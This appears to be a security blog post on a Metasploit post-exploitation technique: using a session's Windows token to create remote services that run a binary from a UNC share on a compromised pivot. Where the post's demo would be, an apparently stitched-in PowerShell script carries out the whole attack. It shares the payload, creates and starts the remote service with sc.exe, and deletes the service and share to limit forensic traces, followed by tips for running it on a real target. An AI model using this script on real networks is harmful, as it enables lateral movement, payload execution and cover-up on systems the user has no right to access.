Last updated at Wed, 30 Aug 2017 16:03:45 GMT

At DEF CON this year I talked about some of the post exploitation capabilities within Metasploit and demo'd a cool technique I developed with Jabra on a pentest a year or so ago (I later found out that Mubix had come up with basically the same idea - great minds think alike). It is essentially this: use a session's current token to create a remote service on a victim machine.

It takes advantage of a feature in Windows that most people take completely for granted. Given that you are already logged in to your desktop machine, you can browse around on shares as yourself transparently due to Windows' security token mechanism. This extends to more than just file shares, and to more than just console logins. If your user has Local Administrator access on the target machine, you can also fiddle with the registry and start/stop services, all without knowing a password or hash. Anyone familiar with how psexec works will notice the awesomesauce here.

When doing a normal psexec, Metasploit uploads an exe to the remote system and uses that as the service executable. It turns out the Windows API accepts a UNC path as a service's binary path, and since we already control a system on the network, we can reduce the forensic footprint across the network by uploading the executable to that compromised machine only. Then we start a file share on it and point every victim's service at a UNC path into that share, so only one filesystem ever holds the actual executable, and only for as long as the module is running. Here's the module in action:


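The same sequence done by hand with built-in Windows tooling, as an added example that is not the Metasploit module or any of its code. It assumes an interactive PowerShell session on the already-compromised pivot, running as a user who is a local administrator on the next victim; the host name, share name, folder, service name and executable name are placeholders, not values from the post.

```powershell
# Added example: the UNC-path service trick done by hand with sc.exe and net share.
# Run on the already-compromised pivot, as a user who is a local admin on $Target.
# Every value below is an assumed placeholder, not something taken from the post.

param(
    [string]$Target    = 'VICTIM01',             # next victim (assumed)
    [string]$ShareDir  = 'C:\Windows\Temp\svc',  # folder on this pivot holding the exe (assumed)
    [string]$ShareName = 'svc$',                 # hidden share name (assumed)
    [string]$SvcName   = 'upd',                  # throwaway service name on the target (assumed)
    [string]$ExeName   = 'payload.exe'           # executable already copied into $ShareDir (assumed)
)

$me = $env:COMPUTERNAME

# 1. Host the single copy of the executable on this pivot. The service on $Target runs
#    as LocalSystem, which reaches the network as the target's *computer* account, so the
#    share must be readable by that account (Everyone here; Domain Computers is tighter).
net share "$ShareName=$ShareDir" /GRANT:Everyone,READ | Out-Null

# 2. Create the service remotely. No password or hash is supplied: the RPC call to the
#    target's Service Control Manager is authenticated with this session's existing token.
#    sc.exe requires the space after each 'binPath=' and 'start=' keyword.
sc.exe "\\$Target" create $SvcName binPath= "\\$me\$ShareName\$ExeName" start= demand | Out-Null

# 3. Start it. Unless the executable actually talks to the SCM, 'start' reports a timeout
#    after the binary has already been launched; that is normal for psexec-style payloads.
sc.exe "\\$Target" start $SvcName

# 4. Clean up: remove the service and tear down the share so the only on-disk copy of the
#    executable exists for no longer than this script is running.
sc.exe "\\$Target" delete $SvcName | Out-Null
net share $ShareName /DELETE | Out-Null
```

Two things to check before running this against a real target: that the target can resolve the pivot's host name (or substitute its IP in the UNC path), and that the share and NTFS permissions actually admit the target's computer account, since a LocalSystem service cannot present the interactive user's token when it opens the UNC path.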
I'll be talking about more of the local exploitation capabilities in Metasploit at Derbycon, I hope to see you there.